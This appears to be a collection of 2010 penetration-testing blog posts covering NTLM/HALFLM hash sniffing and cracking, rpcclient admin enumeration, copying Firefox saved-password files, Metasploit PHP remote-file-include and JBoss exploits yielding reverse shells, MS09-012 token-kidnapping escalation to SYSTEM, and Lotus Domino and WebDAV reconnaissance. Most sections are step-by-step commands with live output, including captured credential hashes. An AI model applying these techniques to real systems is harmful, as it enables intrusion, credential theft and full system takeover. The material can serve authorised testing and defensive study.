5.0:NULL:1122334455667788:dce867f0cb638db2dbcc3576a52dc4612f85252cc731bb25:8990b33dac65c5ef75073829894b911a983c1e260fbd1097 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:6f9d851d74c8a095c9df672a1554bebc2f85252cc731bb25:89953de6f957b7db5fe664d23af3de41dd38f5ec0a4a6eb0 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b7582273227fd61a5952f85252cc731bb25:76d3c3deb0bb8ef1a1e41ab6a3f6c686a321ce016c624567 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b754db66776827758d30b7892eef2e3f2bc:df58ae0f786becc11be11034dc53b21bdf1d73579af868d1 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:de5d1d85daf6593d0a09ff32049013ab2f85252cc731bb25:526471d8c4a0ecc8af05851804ea8fdd26848fa3ccc63152 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:b8489edee1058b43f3ce0f0abe5a16872f85252cc731bb25:57b9c47a75335692f60e787e41cd16a292a21bc667b3fd02 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:2b6b134af8d48f2a972bff5660420d582f85252cc731bb25:5018402148e15a8d77cb22dd46f1449a2791416b73ee9c3d ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:bb49aefd51ed0dccd5be291bd33be3052f85252cc731bb25:c9b255750bd88ac72e03adafda261e62618c943f7d59daf5
Tags:

9:56
Revisiting HALFLM Stuff
» ‎ Carnal0wnage

I covered some of the halflm challenge sniffing stuff in a previous post.

but I had to revisit it the other day for work and couldn't find the actually tables and program from the post.

so here are some updated links.

where to grab the tables:

http://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/halflmchall/

where to grab the program:

http://sourceforge.net/projects/rcracki/

Some gotchas I ran into on the last PT was some reason getting odd hashes in the SMB and NTLM sniffing modules.

in some cases the hashes were not the same for the same username and hostname, these were unusable, I also had some that had a bunch of zeros in them, those were also not crackable.

Windows 2000 2195:Windows 2000 5.0:1122334455667788:4c4d5353500003000000010001004600000000000000470000000000000040000000000000004000000006000600400000001000100047000000158a88e048004f0044000081196a7af2e4491c28af3025741067535700:00000000000000000000000000000000

But I did get smb_login scanned, that was fun:

ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:59de5d885e583167c3a9a92ac42c0ae52f85252cc731bb25:5ada49d539bd174e7049805dc1004925e25130c33dbe892a ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:40305b22075d6000d0508d9ad1f7beb02f85252cc731bb25:337c939e66480243d1833309b8afe49a81fe4c5e646bf00a ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:daf3570c10ed2817c3d8a05d69f9ef292f85252cc731bb25:d3fb390bac5d152f7a394466fbef686e275d05b99c0a115e ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:d737aa8f95ce38359cab5d8a2519c4b92f85252cc731bb25:0624a3f7d457c54b163c641dbf4b7963548ef1c5d0397cbf ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:0e89a68d07e315c6035e82b757b955882f85252cc731bb25:58f2d720179b4a38a0523e02aef0d41dacccd6577eaa943c ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:aa9436c1d40cb53f3e7a20091c4b931c2f85252cc731bb25:8ac45acdbd60f2fad3081ecf005536efa6009c21ca5faf36 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:dce867f0cb638db2dbcc3576a52dc4612f85252cc731bb25:8990b33dac65c5ef75073829894b911a983c1e260fbd1097 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:6f9d851d74c8a095c9df672a1554bebc2f85252cc731bb25:89953de6f957b7db5fe664d23af3de41dd38f5ec0a4a6eb0 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b7582273227fd61a5952f85252cc731bb25:76d3c3deb0bb8ef1a1e41ab6a3f6c686a321ce016c624567 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b754db66776827758d30b7892eef2e3f2bc:df58ae0f786becc11be11034dc53b21bdf1d73579af868d1 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:de5d1d85daf6593d0a09ff32049013ab2f85252cc731bb25:526471d8c4a0ecc8af05851804ea8fdd26848fa3ccc63152 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:b8489edee1058b43f3ce0f0abe5a16872f85252cc731bb25:57b9c47a75335692f60e787e41cd16a292a21bc667b3fd02 ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:2b6b134af8d48f2a972bff5660420d582f85252cc731bb25:5018402148e15a8d77cb22dd46f1449a2791416b73ee9c3d ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:bb49aefd51ed0dccd5be291bd33be3052f85252cc731bb25:c9b255750bd88ac72e03adafda261e62618c943f7d59daf5
Tags: null admin windows gotchas hashes zeros Pentesting
June 30, 2010
19:11
more with rpcclient
» ‎ Carnal0wnage

Got asked to help remotely locate local admins on boxes on a network.

rpcclient $> enumalsgroups
Usage: enumalsgroups builtin|domain [access mask]

rpcclient $> enumalsgroups builtin
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Guests] rid:[0x222]
group:[Network Configuration Operators] rid:[0x22c]
group:[Power Users] rid:[0x223]
group:[Remote Desktop Users] rid:[0x22b]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]

Now you would think that doing a querygroup would give you the right output, but actually you get a:

rpcclient $> querygroup 0x220
result was NT_STATUS_NO_SUCH_GROUP

Honestly I have no idea why this doesn't work, it *should*. If anyone knows why it doesn't I know more than one person who would like to know.

Anyway it takes one more step but you can do it this way:

rpcclient $> queryaliasmem
Usage: queryaliasmem builtin|domain rid [access mask]

rpcclient $> queryaliasmem builtin 0x220
sid:[S-1-5-21-1214440339-1383384898-839522115-500]
sid:[S-1-5-21-1214440339-1383384898-839522115-1003]
sid:[S-1-5-21-2392188729-2485841371-4291725810-512]

Then you can look up who those SIDs belong to

rpcclient $> lookupsids
Usage: lookupsids [sid1 [sid2 [...]]]

rpcclient $> lookupsids S-1-5-21-1214440339- 1383384898-839522115-500
S-1-5-21-1214440339-1383384898-839522115-500 PC\Administrator (1)

rpcclient $> lookupsids
S-1-5-21-1214440339-1383384898-839522115-1003
S-1-5-21-1214440339-1383384898-839522115-1003 PC\user (1)

rpcclient $> lookupsids
S-1-5-21-2392188729-2485841371-4291725810-512 rpc_api_pipe: Remote machine 192.168.242.128 pipe \lsarpc fnum 0x4001 returned critical error. Error was Call timed out: server did not respond after 10000 milliseconds result was NT_STATUS_IO_TIMEOUT

Not sure about the 512 (its a MS built-in account I think) but the 1003 was the user I added to the local admins group.
Tags: rpcclient group sid admins-group pc-administrator group-power Pentesting
June 28, 2010
11:58
Firefox Saved Passwords
» ‎ Carnal0wnage

Nothing earth shattering, but since this is a place for my notes...

Sometimes while you are on a box and pilfering through all the documents doesn't yield anything useful for you to move laterally you can sometimes grab the Firefox saved passwords. Lots of times someone will save their password to the corporate OWA, wiki, helpdesk page, or whatever. Even if doesn't give you a *great* lead you'll at least get an idea if they are a password re-user or not.

So how to do it?

Actually its simple. Inside of the mozilla\firefox directory will be somethingrandom.default. Inside that folder you'll find:

key3.db
signons.sqlite

If there is no master password set, all you have to do is replace the files on your test VM with the two files you downloaded, open firefox, go to preferences, security, and do a view saved passwords.

I think there are some fancy Firefox plug-ins that can pull this info out and I'm sure there are some binaries you can push up that will dump this for you as well. But this is quick and easy and you're probably already downloading files (at least you probably *should* be) anyway...

-thanks to Mubix for telling me about this.
Tags: saved password firefox mozilla-firefox plug-ins owa Pentesting
May 11, 2010

Permalink for 'Using the Metasploit PHP Remote File Include Module'

19:19

Using the Metasploit PHP Remote File Include Module

» ‎ Carnal0wnage

Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.

Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of:

/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]

and make your PHPURI

PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX

let's see it in action

msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...

Exploits
========

Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit

msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > info

Name: PHP Remote File Include Generic Exploit
Version: 8762
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent

Provided by:
hdm
egypt

Available targets:
Id Name
-- ----
0 Automatic

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload information:
Space: 32768

Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:

msf exploit(php_include) > set PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX
PHPURI => /slogin_lib.inc.php?slogin_path=XXpathXX
msf exploit(php_include) > set PATH /1/
PATH => /1/
msf exploit(php_include) > set RHOST 192.168.6.68
RHOST => 192.168.6.68
msf exploit(php_include) > set RPORT 8899
RPORT => 8899
msf exploit(php_include) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(php_include) > set LHOST 192.168.6.140
LHOST => 192.168.6.140
msf exploit(php_include) > exploit

[*] Started bind handler
[*] Using URL: http://192.168.6.140:8080/RvSIqhdft
[*] PHP include server started.
[*] Sending /1/slogin_lib.inc.php?slogin_path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%36%2e%31%34%30%3a%38%30
%38%30%2f%52%76%53%49%71%68%64%66%74%3f
[*] Command shell session 1 opened (192.168.6.140:34117 -> 192.168.6.68:8899) at Sun May 09 21:37:26 -0400 2010

dir
0.jpeg  header.inc.php license.txt slog_users.txt  version.txt
1.jpeg  index.asp old  slogin.inc.php
adminlog.php install.txt readme.txt slogin_genpass.php
footer.inc.php launch.asp slog_users.php slogin_lib.inc.php

id uid=33(www-data) gid=33(www-data) groups=33(www-data)

Tags: slogin path php uri php-shell metasploit command-shell Pentesting

May 10, 2010

Permalink for 'Playing with the MS09-012 Windows Local Exploit'

7:29

Playing with the MS09-012 Windows Local Exploit

» ‎ Carnal0wnage

Back in 09 there was a buzz about token kidnapping by Argeniss
http://www.argeniss.com/research.html

http://www.argeniss.com/research/TokenKidnapping.pdf

subsequently patched http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx

I'm normally violently against uploading binaries to boxes but until the local exploit functionality is added to msf...

The gist is you an run the Churrasco binary and it will execute a command for you as SYSTEM from NETWORK SERVICE (the shell privs you get when exploiting IIS). See the slides for more.

Lets see it in action.

We have our network service shell, push up our churrasco binary, metasploit payload, and run it.

*I had issues on my VM getting staged payloads in msf to run, so I opted for a shell/reverse_tcp and then tried to upgrade the shell to meterpreter.

[*] Meterpreter session 3 opened (192.168.6.94:443 -> 192.168.6.94:62700)

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > pwd
c:\windows\system32\inetsrv

Upload the exploit binary and your reverse shell binary. I used the webdav vuln that got me on the box to upload it as churrasco.bin, network service is weird about where it can write to, but it should be writable somewhere if you don't have the file upload route.

meterpreter > shell
Process 3872 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\windows\system32\inetsrv>cd C:\Inetpub\wwwroot
C:\Inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is F48F-220E

Directory of C:\Inetpub\wwwroot

05/10/2010  06:53 AM              .
05/10/2010  06:53 AM              ..
05/10/2010  06:53 AM           410,624 Churrasco.bin
02/21/2003  06:48 PM             1,433 iisstart.htm
05/10/2010  07:19 AM            37,888 shell.bin
05/10/2010  07:43 AM               173 test4.asp;.txt
           4 File(s)      2,105,685 bytes
            2 Dir(s)  36,227,641,344 bytes free

Let's run the exploit and have it kick off our reverse shell back to us. Set up the multi/handler... blah blah

C:\Inetpub\wwwroot>Churrasco.bin shell.bin
Churrasco.bin shell.bin
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 680
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM

on the multi/handler side...

[*] Command shell session 1 opened (192.168.6.94:443 -> 192.168.6.94:62854)


(C) Copyright 1985-2003 Microsoft Corp.

C:\Inetpub\wwwroot>whoami
whoami
nt authority\system

C:\Inetpub\wwwroot>^Z
Background session 1? [y/N]  y
msf exploit(handler) > sessions -u 1
msf exploit(handler) > [*] Meterpreter session 2 opened (192.168.6.94:443 -> 192.168.6.94:62855)

msf exploit(handler) > sessions -l

Active sessions
===============

Id  Type         Information                           Connection
--  ----         -----------                           ----------
1   shell        Microsoft Windows [Version 5.2.3790]  192.168.6.94:443 -> 192.168.6.94:62854
2   meterpreter  NT AUTHORITY\SYSTEM @ LAB          192.168.6.94:443 -> 192.168.6.94:62855

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Tags: service churrasco shell microsoft-windows-version inetpub-wwwroot volume-serial-number Pentesting

May 09, 2010

Permalink for 'Metasploit jboss deployment file repository exploit'

8:24

Metasploit jboss deployment file repository exploit

» ‎ Carnal0wnage

MC pushed out a new exploit today (jboss_deploymentfilerrepository)
so while it lists 4.x as vuln, actually several other versions are vulnerable as well including 6.0.0M1 and 5.1.0 :-)

msf exploit(jboss_deploymentfilerepository) > exploit

[*] Started reverse handler on 192.168.1.101:4444
[*] Triggering payload at '/web-console/HYQ.jsp'...
[*] Command shell session 3 opened (192.168.1.101:4444 -> 192.168.1.101:57796) at Sun May 09 11:20:31 -0400 2010

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>whoami
whoami
win2k3lab\administrator

C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin>^Z
Background session 3? [y/N]  y
msf exploit(jboss_deploymentfilerepository) > sessions -l

Active sessions
===============

Id  Type   Information  Connection
--  ----   -----------  ----------
3   shell               192.168.1.101:4444 -> 192.168.1.101:57796

msf exploit(jboss_deploymentfilerepository) > sessions -u 3

msf exploit(jboss_deploymentfilerepository) >
msf exploit(jboss_deploymentfilerepository) > [*] Meterpreter session 4 opened (192.168.1.101:4444 -> 192.168.1.101:36591) at Sun May 09 11:21:32 -0400 2010

msf exploit(jboss_deploymentfilerepository) > sessions -l

Active sessions
===============

Id  Type         Information                                      Connection
--  ----         -----------                                      ----------
3   shell                                                         192.168.1.101:4444 -> 192.168.1.101:57796
4   meterpreter  win2k3lab\Administrator @ win2k3lab  192.168.1.101:4444 -> 192.168.1.101:36591

msf exploit(jboss_deploymentfilerepository) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: win2k3lab\Administrator
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop\jboss-6.0.0.M1\jboss-6.0.0.M1\bin
meterpreter >

Tags: msf deploymentfilerepository meterpreter jsp-command shell-session information-connection Pentesting

May 06, 2010
20:22
Layer Four Traceroute
» ‎ Carnal0wnage

Layer Four Traceroute (lft) http://pwhois.org/lft

If you are using the one bundled with your distro you are probably missing out some of the more interesting and new features.

From the site:

"LFT, short for Layer Four Traceroute, is a sort of 'traceroute' that often works much faster (than the commonly-used Van Jacobson method) and goes through many configurations of packet-filters (firewalls). More importantly, LFT implements numerous other features including AS number lookups through several reliable sources, loose source routing, netblock name lookups, et al. What makes LFT unique? LFT is the all-in-one traceroute tool because it can launch a variety of different probes using ICMP, UDP, and TCP protocols, or the RFC1393 trace method."

Its been useful for me to locate more systems between me and the target host as well as identifying gateways/web firewalls that organization's send all (or some)web traffic through.

It also handy that you can throw it some switches to show the AS and network routes with the scan as well.

Old Traceroute:

cg@meh:~/evil/lft-3.1$ traceroute www.microsoft.com
traceroute to www.microsoft.com (65.55.21.250), 30 hops max, 60 byte packets
1 192.168.1.1 (192.168.1.1) 4.681 ms 5.794 ms 14.193 ms
2-8 Local Stuff
9 pos-0-0-0-0-pe01.ashburn.va.ibone.comcast.net (68.86.86.26) 35.743 ms 36.391 ms 37.102 ms
10 as8075-1.ashburn.va.ibone.comcast.net (75.149.230.42) 173.747 ms 174.136 ms 175.054 ms
11 209.240.199.162 (209.240.199.162) 32.762 ms 33.703 ms 37.096 ms
12 ge-6-1-0-0.bl2-64c-1a.ntwk.msn.net (207.46.43.5) 17.652 ms 28.151 ms 24.033 ms
13 ge-0-0-0-0.bl2-64c-1b.ntwk.msn.net (207.46.43.85) 24.864 ms 25.951 ms 26.485 ms
14 ge-3-1-0-0.co2-64c-1a.ntwk.msn.net (207.46.43.101) 109.384 ms 109.615 ms 110.180 ms
15 ge-7-0-0-0.co2-64c-1b.ntwk.msn.net (207.46.43.197) 106.607 ms 107.401 ms 110.382 ms
16 207.46.46.92 (207.46.46.92) 112.458 ms 118.682 ms 106.207 ms
17 10.22.8.14 (10.22.8.14) 107.323 ms 107.552 ms 107.789 ms
18 * * *
19 * * *
20 * * *
21 * * *
22 * * *
23 * * *
24 * * *
25 * * *
26 * * *
27 * * *
28 * * *
29 * * *
30 * * *

Layer Four Traceroute

cg@meh:~/evil/lft-3.1$ sudo lft -rNS www.microsoft.com -d 80
TTL LFT trace to 65.55.21.250:80/tcp
1 [33657] [CMCS] 192.168.1.1 2.3/1.5ms ** [neglected] no reply packets received from TTLs
2 through -8 local stuff
9 [7922] [COMCAST-7922] pos-0-0-0-0-pe01.ashburn.va.ibone.comcast.net (68.86.86.26) 27.2/26.6ms
10 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] as8075-1.ashburn.va.ibone.comcast.net (75.149.230.42) 25.9/24.3ms
11 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] 209.240.199.162 15.8/24.3ms
12 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-6-1-0-0.bl2-64c-1a.ntwk.msn.net (207.46.43.5) 34.1/14.8ms
13 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-0-0-0-0.bl2-64c-1b.ntwk.msn.net (207.46.43.85) 16.0/15.9ms
14 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-3-1-0-0.co2-64c-1a.ntwk.msn.net (207.46.43.101) 121.3/98.2ms
15 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] ge-7-0-0-0.co2-64c-1b.ntwk.msn.net (207.46.43.197) 114.1/97.3ms
16 [6067] [ONYX] 207.46.46.92 101.6/99.9ms
17 [8075] [MICROSOFT-CORP---MSN-AS-BLOCK] 10.22.8.14 99.5/109.5ms
18 [AS?] [Net?] [target open] 65.55.21.250:80 98.5/109.4ms
Tags: traceroute ntwk msn van-jacobson target-host byte-packets Pentesting
May 05, 2010

Permalink for 'Metasploit Lotus Domino Version Scanner'

6:36

Metasploit Lotus Domino Version Scanner

» ‎ Carnal0wnage

I pushed out the first of a few Lotus Domino modules I've been working on to the metasploit trunk last nite.

The first one is a Lotus Domino Version Module.

There is no real "banner grabbing" for versions with Lotus Domino, old old versions "may" display the version in the server headers but I've never seen anything above 5.x do this. You usually get something like:

HTTP/1.0 200 OK
Server: Lotus-Domino
Date: Fri, 30 Apr 2010 00:19:11 GMT
Last-Modified: Wed, 07 Apr 2010 01:39:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5390
Cache-control: private
ETag: W/"MTAtODA4NS1DMTI1NzZENjAwMTVGRDhELTAtMA=="

for headers.

Useful enough to identify that its a Domino web server but not so much for using the couple of remote exploits out there that are very version and/or fixpack dependent.

There are a couple of files that the web server may serve up that have version information.

The first being iNotes/FormsX.nsf that usually has the version information as a comment in the html (this can be turned off) and the second being download/filesets/l_LOTUS_SCRIPT.inf
type files that has the base install version (at least as far as I can tell its the base install). *If thats not right please let me know*

So let's give it a test drive...

msf > use auxiliary/scanner/lotus/lotus_domino_version
msf auxiliary(lotus_domino_version) > info

      Name: Lotus Domino Version
   Version: $Revision$
   License: Metasploit Framework License (BSD)
      Rank: Normal

Provided by:
 CG

Basic options:
 Name     Current Setting  Required  Description
 ----     ---------------  --------  -----------
 PATH     /                yes       path
 Proxies                   no        Use a proxy chain
 RHOSTS                    yes       The target address range or CIDR identifier
 RPORT    80               yes       The target port
 THREADS  1                yes       The number of concurrent threads
 VHOST                     no        HTTP server virtual host

Description:
 Checks to determine Lotus Domino Server Version.

msf auxiliary(lotus_domino_version) > set RHOSTS file:/home/user/shodan-domino.txt
RHOSTS => file:/home/user/shodan-domino.txt
msf auxiliary(lotus_domino_version) > run

[*] 192.168.245.101:80 Lotus Domino Current Version: 6.5.4 (Windows NT/Intel)
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.245.101:80 Lotus Domino Base Install Version: 6.0.5.50
[*] 192.168.80.132:80 Lotus Domino Current Version: 6.5.5 (Solaris Sparc)
[*] 192.168.80.132:80 Lotus Domino Base Install Version: 6.0.4
[*] 192.168.80.132:80 Lotus Domino Base Install Version: 6.0.4
[-] no response for 192.168.80.132:80 download/filesets/l_SEARCH.inf
[*] 192.168.80.132:80 Lotus Domino Base Install Version: 6.0.4
[*] Scanned 02 of 20 hosts (010% complete)
[*] 192.168.220.33:80 Lotus Domino Current Version: 8.0.2 HF1190 (Windows NT/Intel)
[*] 192.168.220.33:80 Lotus Domino Current Version: 8.0.2 HF1190 (Windows NT/Intel)
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[*] 192.168.220.33:80 Lotus Domino Base Install Version: 8.0.1.0
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/iNotes/Forms5.nsf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/iNotes/Forms6.nsf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/iNotes/Forms7.nsf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/download/filesets/l_LOTUS_SCRIPT.inf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/download/filesets/n_LOTUS_SCRIPT.inf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/download/filesets/l_SEARCH.inf
[-] 192.168.152.68:80 302 Redirect to https://192.168.152.68/download/filesets/n_SEARCH.inf
[*] Scanned 04 of 20 hosts (020% complete)
[*] 192.168.166.33:80 Lotus Domino Current Version: 7.0.1 (Windows NT/Intel)
[*] 192.168.166.33:80 Lotus Domino Current Version: 7.0.1 (Windows NT/Intel)
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] 192.168.166.33:80 Lotus Domino Base Install Version: 7.0.1.0
[*] Scanned 06 of 20 hosts (030% complete)
[*] 192.168.33.93:80 Lotus Domino Current Version: 7.0.2 (Windows NT/Intel)
[*] 192.168.33.93:80 Lotus Domino Current Version: 7.0.2 (Windows NT/Intel)
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.33.93:80 Lotus Domino Base Install Version: 7.0.2.0
[*] 192.168.246.154:80 Lotus Domino Current Version: 7.0.3FP1 (Windows NT/Intel)
[*] 192.168.246.154:80 Lotus Domino Current Version: 7.0.3FP1 (Windows NT/Intel)
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
[*] 192.168.246.154:80 Lotus Domino Base Install Version: 7.0.3.0
...

Tags: lotus install windows domino-version domino-current domino-server domino domino-base lotus-domino-server domino-web-server target-address

May 03, 2010

Permalink for 'More with Metasploit and WebDAV'

7:20

More with Metasploit and WebDAV

» ‎ Carnal0wnage

intro..webdav stuff...lazy...

To get yourself a test environment you can follow this tutorial, its not bad. You'll want to make sure you pay attention to the part about allowing your IUSR_WHATEVER account to have have write access or you can set up a windows account to use authentication.

metasploit has a few modules to test for webDAV presence.

webdav_scanner:

msf auxiliary(webdav_scanner) > run

[*] 192.168.242.134 (Microsoft-IIS/6.0) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

webdav_internal_ip

msf auxiliary(webdav_internal_ip) > run

[*] Found internal IP in WebDAV response (192.168.242.134) 192.168.242.134
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

webdav_website_content

msf auxiliary(webdav_website_content) > run
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/iisstart.htm
[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/pagerror.gif
[*] Found file or directory in WebDAV response (192.168.242.134) http://domino/davaroo/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The important one there is the davaroo directory if someone has shared out the root directory it will usually just look like this:

[*] Found file or directory in WebDAV response (192.168.242.134) http://192.168.242.134/

Or if you have the path wrong

msf auxiliary(webdav_test) > run

[*] 192.168.242.134/DAV/ has DAV DISABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

If we need to see what options are allowed, you can use the http options auxiliary module.

msf auxiliary(options) > run

[*] 192.168.242.134 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

to see if you can upload things quickly you can give DAVtest a try or Ryan Linn's webdav_test module.

msf auxiliary(webdav_test) > run

[*] 192.168.242.134/davaroo/ has DAV ENABLED
[*] Attempting to create /davaroo/WebDavTest_111vO5Ats7
[*] 192.168.242.134/davaroo/ is WRITEABLE
[*] Trying /davaroo/WebDavTest_111vO5Ats7/9RiwStjSE7bI4dv.html
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pd84WuxboP6ZvcN.jhtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/Lqy4HqgiNoqS9YQ.php
[*] Trying /davaroo/WebDavTest_111vO5Ats7/y2QL82GmZvFHv0U.txt
[*] Trying /davaroo/WebDavTest_111vO5Ats7/W2CNVzATLpt9XeU.cgi
[*] Trying /davaroo/WebDavTest_111vO5Ats7/acl1gOJlmSu5fXf.pl
[*] Trying /davaroo/WebDavTest_111vO5Ats7/pKR4pLVcDpcPCnB.jsp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/KWj69GgzXIHrR0j.aspx
[*] Trying /davaroo/WebDavTest_111vO5Ats7/1ImlpmATPINV2Zj.asp
[*] Trying /davaroo/WebDavTest_111vO5Ats7/OT0B3cOEFLgnIGB.shtml
[*] Trying /davaroo/WebDavTest_111vO5Ats7/yGSr7GVoEmjcQCf.cfm
[*] Attempting to cleanup /davaroo/WebDavTest_111vO5Ats7
[*] Uploadable files are: html,jhtml,php,txt,cgi,pl,jsp,aspx,cfm
[*] Executable files are: html,txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

What you'll probably run into here is the INABILITY to upload executable content or anything otherwise useful on the box. in this case i can upload php, cgi, jsp, aspx, but nothing is there to execute any of that content.

